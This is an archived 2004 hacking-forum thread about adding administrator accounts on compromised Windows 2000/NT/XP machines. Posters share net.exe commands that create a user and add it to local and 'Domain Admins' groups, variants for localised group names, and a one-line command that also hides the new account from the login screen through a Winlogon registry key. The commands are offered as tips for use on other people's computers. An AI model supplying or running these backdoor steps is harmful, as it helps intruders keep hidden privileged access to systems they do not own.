Forums: Add New Administrator - Forums

Jump to content

  • (2 Pages)
  • +
  • 1
  • 2
  • You cannot start a new topic
  • You cannot reply to this topic

Add New Administrator for win2000\nt\xp

#1 Guest_Qlimax_*

Group:
Guests

Posted 06 June 2004 - 05:38 AM

just run this command on supertted computer\OS.
net user YOURUSER YOURPASS /add >> Add_admin.txt
net localgroup Administrator YOURUSER /add >> Add_admin.txt
net group "Domain Admins" YOURUSER /add >> Add_admin.txt


n`joy
0

#2 User is offline   kingvandal

  • Master Sergeant
  • Icon
Group:
Second Lieutenant
Posts:
713
Joined:
27-January 04

Posted 06 June 2004 - 05:52 AM

to add youself to other domain admin groups use the bat file I posted on here. It will find all groups etc..

Rich
Tchirimbimbim!!!
Very Interesting: Windows XP Source Code! and Windows Vista Source Code!!. Read'em and weap...
0

#3 Guest_DaRul0r_*

Group:
Guests

Posted 06 June 2004 - 08:02 PM

can you say, where it is king? THX...
0

#4 Guest_SeNSeMaNN_*

Group:
Guests

Posted 06 June 2004 - 08:11 PM

whats so special on these commands ?!
0

#5 User is offline   _rage_

  • Private First Class
  • Icon
Group:
Members
Posts:
40
Joined:
02-December 03

Posted 07 June 2004 - 04:29 AM

do you really think noone knew about these commands yet?
its plain and simple net.exe commands, EVERYONE who even REMOTELY thinks about hacking knows these. if not he should better not bother anyway.

jeez, lady, get a clue.
0

#6 User is offline   B3T4

  • Sergeant
  • Icon
Group:
Members
Posts:
234
Joined:
01-September 03

Posted 07 June 2004 - 08:02 AM

Qlimax, on Jun 6 2004, 05:38 AM, said:

just run this command on supertted computer\OS.
net user YOURUSER YOURPASS /add >> Add_admin.txt
net localgroup Administrator YOURUSER /add >> Add_admin.txt
net group "Domain Admins" YOURUSER /add >> Add_admin.txt


n`joy

LOL, its with out the >> Add_admin.txt :P
0

#7 User is offline   Eichel65

  • Private
  • Icon
Group:
Members
Posts:
12
Joined:
15-October 03

Posted 07 June 2004 - 09:53 AM

ren Add_admin.txt Add_admin.bat :D

Add_admin.bat

but in other languages the localgroup Administrator not exist ^^

gruß
0

#8 User is offline   xamilQ

  • Private First Class
  • Icon
Group:
Members
Posts:
24
Joined:
31-August 03

Posted 07 June 2004 - 10:29 AM

Eichel65, on Jun 7 2004, 09:53 AM, said:

ren Add_admin.txt Add_admin.bat  :D

Add_admin.bat

but in other languages the localgroup Administrator not exist ^^

gruß

net localgroup administrators [user] /add
net localgroup administrator [user] /add
net localgroup administratoren [user] /add
net localgroup administradors [user] /add
net localgroup administrateurs [user] /add

Some Other Languages, I thinq English, Dutch, French, Spanish, German should work with this :)
0

#9 User is offline   kingvandal

  • Master Sergeant
  • Icon
Group:
Second Lieutenant
Posts:
713
Joined:
27-January 04

Posted 07 June 2004 - 03:08 PM

search for it. look @ my posts.

Rich
Tchirimbimbim!!!
Very Interesting: Windows XP Source Code! and Windows Vista Source Code!!. Read'em and weap...
0

#10 User is offline   ANORIUS

  • Private
  • Icon
Group:
Members
Posts:
16
Joined:
14-February 04

Post icon  Posted 08 June 2004 - 01:22 PM

Quote

net localgroup administrators [user]/add
net localgroup administrator [user] /add
net localgroup administratoren [user] /add
net localgroup administradors [user] /add
net localgroup administrateurs [user] /add

Some Other Languages, I thinq English, Dutch, French, Spanish, German should work with this


net localgroup administratorer [user] /add

for norwegian users :D

And

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v [USER] /t REG_DWORD /d 0

to "hide" the Account.

Edit:
All in ONE cmd line:

net user [USER] [Pass] /add & Net Localgroup Administrators [USER] /add & reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v [USER] /t REG_DWORD /d 0
0

#11 User is offline   kok

  • Private First Class
  • Icon
Group:
Members
Posts:
24
Joined:
30-August 03

Posted 09 June 2004 - 01:36 PM

gopod cmd
more thx ;)
0

#12 User is offline   PL3X59

  • Private First Class
  • Icon
Group:
Members
Posts:
57
Joined:
10-February 04

Posted 09 June 2004 - 01:54 PM

Hi guys :)

can some one tells us who can we made a hidden user ?
I have seen, the topic on this forum but I don't understand who it work

thx


plex
0

#13 User is offline   ANORIUS

  • Private
  • Icon
Group:
Members
Posts:
16
Joined:
14-February 04

Post icon  Posted 10 June 2004 - 09:04 PM

I made a Batch scripter for thes commands, usefull if you are in a hurry or you dont know how you do it.. the thing is that the admin hasse'nt enabled upload, so i can't upload the file and i don't got any homepage, sorry...

Edit:
If an admin wouldent mind, please enable upload... :D
0

#14 Guest_6066up9r_*

Group:
Guests

Posted 11 June 2004 - 03:10 AM

great commands here! they will come in use when i'm on the job!
0

#15 User is offline   hottzo

  • Private First Class
  • Icon
Group:
Members
Posts:
78
Joined:
27-January 04

Posted 12 June 2004 - 11:49 AM

_rage_, on Jun 7 2004, 04:29 AM, said:

do you really think noone knew about these commands yet?
its plain and simple net.exe commands, EVERYONE who even REMOTELY thinks about hacking knows these. if not he should better not bother anyway.

jeez, lady, get a clue.

get a life rage, stop flaming every1 who posts, it's annoying and the only thing you will achieve is a notice+ban from the board....I wonder why you haven't already. This is an info board about security, you should know better if your knowledge is so huge as you think it is, that repeating some security issues which were referred to in the past is necessary for many ppl to learn and the other to remember....so try to think b4 u post...
0

  • (2 Pages)
  • +
  • 1
  • 2
  • You cannot start a new topic
  • You cannot reply to this topic

1 User(s) are reading this topic
0 members, 1 guests, 0 anonymous users